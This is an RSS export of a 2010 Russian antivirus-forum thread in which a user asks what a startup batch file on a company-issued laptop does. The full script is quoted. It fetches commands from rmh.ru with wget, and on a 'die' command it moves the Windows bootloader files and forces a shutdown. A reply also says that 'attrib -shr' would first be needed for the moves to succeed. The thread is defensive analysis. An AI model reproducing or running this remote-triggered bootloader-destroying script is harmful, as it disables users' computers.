<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Запланированные задания (угроза)]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Запланированные задания (угроза) форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Mon, 20 Apr 2026 01:04:47 +0300</pubDate>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3167/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><br />grep — утилита командной строки, которая находит на вводе строки, отвечающие заданному регулярному выражению, и выводит их, если вывод не отменён специальным ключом. Название представляет собой акроним английской фразы «search globally for lines matching the regular expression, and print them» — «искать везде строки, соответствующие регулярному выражению, и выводить их».<br /><br />=============<br />смысл батника видимо в том, чтобы найти в настройках определенный ИП, пропинговать сайт rmh.ru, получить отткуда файл инструкций, протрассировать список команд, если найден STOP, то завершить выполнение в противном соучае управление идет на раздел <b>die</b>, что переводится как "угасать, умирать". Может, это просто любительский батник? с какой целью вам передан ноут от Ромира? <br />
			<i>13.07.2010 10:36:35, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3167/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3167/</guid>
			<pubDate>Tue, 13 Jul 2010 10:36:35 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3166/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Ни одного ответа от Администраторов. <br />
			<i>13.07.2010 10:07:40, Виктор.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3166/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3166/</guid>
			<pubDate>Tue, 13 Jul 2010 10:07:40 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3144/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br />системные файлы перенести не так уж просто.<br />надо для начала атрибуты им поменять. без этого получается такое:<br /><br /><B>C:\&gt;move /y c:\boot.ini c:\windows<br />Не удается найти указанный файл.<br /><br />C:\&gt;move /y c:\ntdetect.com c:\windows<br />Не удается найти указанный файл.<br /><br />C:\&gt;move /y c:\ntldr c:\windows<br />Не удается найти указанный файл.<br /><br />C:\&gt;attrib boot.ini<br />SHR C:\boot.ini<br /><br />C:\&gt;attrib ntdetect.com<br />A SHR C:\NTDETECT.COM<br /><br />C:\&gt;attrib ntldr<br />A SHR C:\ntldr<br /><br />C:\&gt;</B><br /><br />т.е. "плохой батник" должен начинаться со строчек<br />attrib -shr +a boot.ini<br />attrib -shr ntdetect.com<br />attrib -shr ntldr<br /><br />и то я сильно сомневаюсь, что винда "разрешит" такие изменения.<br />=============<br /> <br />
			<i>12.07.2010 03:01:08, Виктор.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3144/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3144/</guid>
			<pubDate>Mon, 12 Jul 2010 03:01:08 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3137/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Может данным методом при последующей установки ОС файл уживается в системе? <br />
			<i>11.07.2010 17:34:56, Виктор.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3137/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3137/</guid>
			<pubDate>Sun, 11 Jul 2010 17:34:56 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3136/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br />:die <br />echo DIE command retrieved <br />echo Moving boot.ini, ntdetect.com, ntldr <br /><br />move /y c:\boot.ini c:\windows <br />move /y c:\ntdetect.com c:\windows <br />move /y c:\ntldr c:\windows <br />echo Shuting down <br />shutdown -s -f -t 0 -c "Computer must be returned" <br />goto end<br /><br />=============<br />Перемещение загрузчика ОС приведет к убийству системы. Зачем, спрашивается? <br />
			<i>11.07.2010 14:12:41, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3136/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3136/</guid>
			<pubDate>Sun, 11 Jul 2010 14:12:41 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3134/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Подскажите о каких сведениях может идти речь?<br /><br />Сайт в структуре bat файла <span class="bx-font" style="color:#FF0000">RMH.RU</span> <br />
			<i>11.07.2010 13:47:24, Виктор.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3134/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3134/</guid>
			<pubDate>Sun, 11 Jul 2010 13:47:24 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>Запланированные задания (угроза)</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic451/message3133/">Запланированные задания (угроза)</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Здравствуйте! объясните пожалуйста смысл файла main.bat который запускается автозагрузкой и включает задачи странного названия.<br /><br />Были выполнены действия:<br />1) c:\windows\system32\<span class="bx-font" style="color:#FF0000">main.bat</span> удалил файл.<br />2) Удалил файлы:<br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">at1.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">at2.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">at3.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">at4.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">At1.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">At2.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">At3.job</span><br />c:\windows\tasks\<span class="bx-font" style="color:#FF0000">At4.job</span><br /><br /><span class="bx-font" style="color:#006699">route print - чист</span><br /><br />Структура bat файла:<br />
====code====
<pre>@echo off
cd c:&#92;windows&#92;system32
:begin
echo Searching for IP adress...
ipconfig | grep IP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noip

:ipfound
echo IP address found in ipconfig output
echo Pinging RMH.RU
ping -n 1 rmh.ru | grep.exe Ping
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noreply

:inet
echo Reply from RMH.RU retrieved
echo Empty command
echo &#62; command.txt
echo Retrieving command from server...
wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1
echo Retrieved, checking command
type command.txt | grep STOP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto end


:STOP
type command.txt | grep STOP &#62; nul
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto wcommand

:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:&#92;boot.ini c:&#92;windows
move /y c:&#92;ntdetect.com c:&#92;windows
move /y c:&#92;ntldr c:&#92;windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end

:noip
echo IP address not found in ipconfig output
goto end

:noreply
echo No reply from RMH.RU
goto end

:wcommand
echo Wrong command retrieved. Typing command:
echo ---
type command.txt
echo ---
goto end

:error
echo Grep error
goto end

:end
</pre>
=============
<br /><br />Вопрос такого характера - ноутбук, предоставлен компанией &quot;Ромир&quot;, у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту. <br />
			<i>11.07.2010 13:39:12, Виктор.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic451/message3133/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic451/message3133/</guid>
			<pubDate>Sun, 11 Jul 2010 13:39:12 +0400</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
	</channel>
</rss>
